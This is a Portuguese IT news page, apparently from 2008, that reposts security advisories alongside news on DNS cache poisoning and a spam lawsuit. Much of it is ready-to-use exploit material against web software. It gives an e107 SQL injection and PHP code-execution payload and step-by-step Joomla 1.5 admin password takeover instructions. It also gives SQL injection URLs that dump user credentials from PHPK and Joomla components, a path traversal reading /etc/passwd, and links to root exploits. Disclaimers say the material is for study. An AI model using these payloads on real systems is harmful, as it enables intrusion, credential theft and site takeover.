::: TiNews.Info ::: Seu Portal de TI

Foi divulgada há pouco tempo uma informação contendo dados para explorar vulnerabilidades no software E107. Estamos informando você, neste instante para que atualize sua aplicação, evitando perdas de dados ou mais dores de cabeça. Abaixo segue o problema e a solução descrita pelo próprio hacker descobridor do erro:

##########################################################
# GulfTech Security Research              August 07, 2008
##########################################################
# Vendor : Steve Dunstan
# URL : http://www.e107.org/
# Version : e107 <= 0.7.11
# Risk : Arbitrary Variable Overwriting
##########################################################

Description:
e107 is a popular full featured content management system written
in php. Unfortunately e107 suffers from an arbitrary variable
overwriting issue within it's download.php file that allows a number
of possible attacks to happen including, but possibly not limited to,
arbitrary php code execution and SQL Injection. No authentication
is required to exploit the issue and it can be exploited regardless
of php magic quotes settings. All users are encouraged to upgrade
their e107 installations as soon as possible.

Arbitrary Variable Overwriting:
There is an arbitrary variable overwrite issue in download.php that
is the result of unsafe usage of the php extract() function. Let's
have a look at the code located in download.php @ lines 85-86

case 'list' :    // Category-based listing
if (isset($_POST['view'])) extract($_POST);

As we see from the above code it is very much possible to overwrite
any variables declared up to this point, but what is the real risk
here? What attacks are possible because of this issue?

view=1&id=-99') UNION SELECT concat(user_name,char(58), user_password),
2,3,4 FROM e107_user WHERE user_id=1/*

One possible attack could involve an attacker sending a post request
to the downloads category view page (download.php?list.1 for example)
with the above data as the post contents, and as a result the username
and pass hash will be displayed in the page title. This SQL Injection
does require magic quotes to be set to it's default value of off.

view=1&action=maincats&execute=aWQ=&template_load_core=echo%20exec
(base64_decode($_POST[execute]));

In addition to the SQL Injection is an arbitrary php code execution
vulnerability. I found that it is possible to execute arbitrary php
code by sending a post request to the downloads category view page
with the above data as the post contents. The above example will
successfully execute the "id" shell command regardless if php magic
quotes gpc settings. A valid download category must be available
though, but this is trivial since an attacker can use the previously
explained SQL Injection to gain admin credentials and add a download
category. Other attacks may be possible though since a majority of
the important variables within the script are at risk.

Solution:
A fix for the issue mentioned in this advisory can be found in the public e107 CVS repository, or accessed directly at the link below.

http://e107.cvs.sourceforge.net/e107/e107_0.7/download.php?r1=1.95&r2=1.96&view=patch&pathrev=MAIN

Credits:
James Bercegay of the GulfTech Security Research Team

Related Info:
The original advisory can be found at the following location

===#################################################################

http://www.gulftech.org/?node=research&article_id=00122-08072008

Hoje foi divulgado um código que serve para explorar vulnerabilidades no Joomla 1.5 - Favor corrigir com pressa, você que utiliza.

O código pode ser encontrado abaixo, MAS DEIXAMOS CLARO que estamos divulgando para que você, programador, leitor ou sysadmin informe as demais pessoas do problema, NÃO PARA USO e muito menos disseminação de exploit. Use consciente do que está fazendo:

#####################################################################################
####                     Joomla 1.5.x Remote Admin Password Change               ####
#####################################################################################
#                                                                                   #
# Author: d3m0n (d3m0n@o2.pl)                                                       #
# Greets: GregStar, gorion, d3d!k                                                   #
#                                                                                   #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff    #
#                                                                                   #
#####################################################################################

File : /components/com_user/controller.php

#####################################################################################
Line : 379-399

	function confirmreset()
	{
		// Check for request forgeries
		JRequest::checkToken() or die( 'Invalid Token' );

		// Get the input
		$token = JRequest::getVar('token', null, 'post', 'alnum');              < --- {1} 

		// Get the model
		$model = &$this->getModel('Reset');

		// Verify the token
		if ($model->confirmReset($token) === false)   < --- {2}
		{
			$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
			$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
			return false;
		}

		$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
	}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130 	

	function confirmReset($token)
	{
		global $mainframe;

		$db	= &JFactory::getDBO();
		$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));  < ---- {3} 

		// Verify the token
		if (!($id = $db->loadResult()))
		{
			$this->setError(JText::_('INVALID_TOKEN'));
			return false;
		}

		// Push the token and user id into the session
		$mainframe->setUserState($this->_namespace.'token',	$token);
		$mainframe->setUserState($this->_namespace.'id',	$id);

		return true;
	}
#####################################################################################

{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "

Example :

1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

========================#####################################################============

Informe a todos que puder e cuide-se de corrigir o erro.

Foi descoberta uma vulnerabilidade no protocolo DNS, essa falha de projeto permite a execução de um ataque conhecido como DNS cache poisoning attacks, esse ataque faz que o servidor DNS seja envenenado com os dados de servidores não autoritativos. Após receber esses dados o servidor irá colocá-los em cache para aumentar o rendimento.
Este ataque quando é bem sucedido pode redirecionar o tráfego de internet e email. Por exemplo o atacante cria uma página falsa então quando um cliente for abrir a página o tráfego é redirecionado para a página falsa sobre controle do atacante.

Essa vulnerabilidade foi corrigida pelo BIND sendo necessário a instalação da versão Bind 9.5.0-P1

New bind9 packages fix cache poisoning neste link mostra como atualizar o bind no Debian, mas tem uma descrição completa dos passos a serem seguidos independente de distribuição para assegurar um bom update.

Verifique se a sua distro já possui atualização do servidor de DNS.

O DNSsec, talvez seja a solução para as vulnerabilidades do DNS. Assisti um palestra no FISL9 do registro.br achei muito interessante inclusive eles disponibilizam um tutorial sobre DNSsec

Referências:

Vulnerabilidade CERT VU#800113
Patches coming today for DNS vulnerability

Apoio da informação: http://petryx.blogrs.com.br/2008/07/08/vulnerabilidade-envenenamento-do-dns/

Um pirata virtual conhecido como “rei do spam” e um parceiro foram condenados pela Justiça federal dos Estados Unidos a pagarem, juntos, US$ 230 milhões ao MySpace (R$ 382,72 milhões) –estima-se que essa é a maior indenização do mundo por esse tipo de prática.

Apesar de, em geral, as empresas demorarem muito tempo até receberem esse tipo de quantia, o julgamento foi considerado uma vitória pelo MySpace. A expectativa é que o fato coiba a ação de “spamers” no site.

“Qualquer pessoa que esteja pensando em enviar um spam vai dizer ‘Oh, é melhor não fazer isso”, afirma o chefe de segurança do MySpace, Hemanshu Nigam. “Spamers não gostam de ser processados. Eles estão lá para ganhar dinheiro. É nosso trabalho dar um aviso para que eles parem”.

O juiz Audrey B. Collins, de Los Angeles, deu ganho de causa ao MySpace na segunda-feira (12), depois que os acusados, Sanford Wallace e Walter Rines, não compareceram a um depoimento no tribunal.

Wallace ganhou o apelido de “rei do spam” e “Spamford” ao chefiar uma empresa que enviava mais de 30 milhões de e-mails com lixo eletrônico por dia nos anos 90. Ele deixou a empresa, chamada Cyber Promotions, respondendo a processos impetrados por grandes provedores de internet como a AOL.

Nigam afirma que Wallace e Rines criaram suas próprias contas no MySpace ou usaram profiles já existentes ao roubar senhas de outros usuários por meio de golpes como ” phishing scan” –envio de e-mails ou mensagens que buscam obter dados pessoais dos usuários.

“Veja vídeo”

Eles, então, mandaram e-mails para outros membros da rede social –a mensagem pedia que os internautas assistissem a um filme em outro site. “Quando você chegava lá, eles ganhavam dinheiro ao tentar vender alguma coisa, ou ganhavam dinheiro por meio dos cliques [dos internautas], ou vendiam ‘ringtones”, diz o executivo.

De acordo com o MySpace, a dupla enviou mais de 730 mil mensagens para usuários do MySpace –muitos deles acabavam adicionando os spamers como amigos, dando a perfil deles um “ar de legitimidade”,

Por uma lei anti-spam dos Estados Unidos conhecida como CAN-SPAM, cada infração dá direito de US$ 100 ao MySpace, multa que é triplicada quando as mensagens são enviadas intencionalmente. No cálculo da indenização, foi levada em conta também a ocorrência desse crime segundo outras leis do país, incluindo a legislação da Califórnia, e os custos do processo.

John Levine, integrante da instituição Coalition Against Unsolicited Commercial Email, afirma que antigos processos envolvendo spam resultaram em multas de, no máximo, dezenas de milhões de dólares.

Foram divulgadas múltiplas vulnerabilidades no Clamav 0.92.1 . Para quem não conhece, o clamav é uma ótima ferramenta de remoção e detecção de víru, que tanto opera em plataformas NT como em plataformas Unix-Like. As fontes com todos os detalhes sobre as vulnerabilidades encontram-se nas referências abaixo:

• ClamAV Changelog (Clam Anti-Virus)
• ClamAV Home Page (Clam Anti-Virus)
• ClamAV libclamav PeSpin Heap Overflow Vulnerability (iDefense Labs)

A microsoft divulgou seus novos ideias em cima do novo navegador (que ainda está em fase beta), totalmente focada na segurança, a empresa  afirma que novos recursos estarão presentes no Windows Server 2008 e no Windows Vista (enable DEP/NX by default in IE 8). Esta funcionalidade já é presente no Internet Explorer 7, mas as intenções são de intensificações junto ao novo navegador.

Foi divulgada hoje uma vulnerabilidade no software  PHPK. A vulnerabilidade serve para injeção de SQL.

http://[target]/comment.php?ID=[SQL]

-------------------------------------------------------------------------------------------------
Exemplo:

http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*

Para os Sysadmins, atualizem ou incentivem a atualização por parte de seus clientes.

OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão Descritos no link.

Foi divulgada uma nova vulnerabilidade (ontem)  que atinge sistemas que operam com o container TomCat, operando em cima do sistema operacional Fedora 6, 7, 8.

A vulnerabilidade permite um acesso root nos sistemas citados.

Apache Tomcat Connector jk2-2.0.2(mod_jk2)

Os dados sobre o exploit estão no link abaixo:

http://milw0rm.com/sploits/2008-x2_fc6f7f8.tar.gz

OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão Descritos no link.

Divulgado exploit para escalar localmente o sistema. Divulgamos o link mas não recomendamos o uso para fins não educativos. ABaixo segue link:

http://www.milw0rm.com/exploits/5320

OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão Descritos no link.

Mais uma daquelas vulnerabilidades que, só vendo para entender a ousadia do atacante, e mais, perceber quão perigoso é criar aplicações web e descuidar de um detalhe:

HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
The script doesn´t check the "t"-parameter.

Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>

OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão Descritos.

Nós cansamos de avisar:

CUIDADO com REGISTER_GLOBALS!
Isto é um fato, tanto que própria Zend não recomenda, basta ver no link da documentação oficial:
http://br.php.net/manual/pt_BR/security.globals.php

Abaixo segue a vulnerabilidade que, adivinhe, explora exatamente este recurso:

powerphpboard.txt

OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão no arquivo.

Mais uma vulnerabilidade foi detectada.
Como sempre, É QUASE QUE OBRIGAÇÃO que os Sysadmins desabilitem register globals para evitar exploração de vulnerabilidades, que não foi diferente neste caso!  Abaixo segue link em txt com a vulnerabilidade:

powerbook.txt

OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão no arquivo.

Detectada uma vulnerabilidade em um componente para o PHPBB, seguindo abaixo o link em txt com a vulnerabilidade:

modulexs.txt

OBS: Por favor, NÃO use este recurso para fins de hacking, e sim, para estudos pois você está sujeito as leis brasileiras ou internacionais. Os direitos autorais estão no arquivo.

Exploit Cinema 1.0

EXPLOiT 1 :

index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOiT 2 :

index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*

Exploit d3000

EXPLOiT :

index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*

Exploit rekry

**Bug:

http://www.target.com/index.php?option=com_rekry&Itemid=xX&rekryview=view&op_id=[SQL]

**Exemplo

http://www.target.com/index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--

Para as pessoas que usam os componentes acima, procure junto ao site dos desenvolvedores os patches.

Divulgado um novo exploit de acesso root para sistemas Sun Solaris 10. Alerta aos Sysadmins, ACESSEM o site http://www.sun.com/download/index.jsp?cat=Patches%20%26%20Updates&tab=3

Para conferir a vulnerabilidade, baixe o arquivo abaixo:

2008-ypk2008.tar.gz

Obs: Nós indicamos o arquivo acima para estudos, e se você os aplica para crimes, FIQUE CERTO de que a LEI Brasileira ou Internacional há de punir com todos os requintes de crueldade, por isso, use para estudos e principalmente, como notícia de segurança para os administradores de sistemas que usam este Sistema Operacional de altíssima qualidade. Repetimos, NÃO apoiamos uso criminoso de ferramentas para pesquisa e segurança (estudar correções de falha ou fazer patch nos códigos danificados).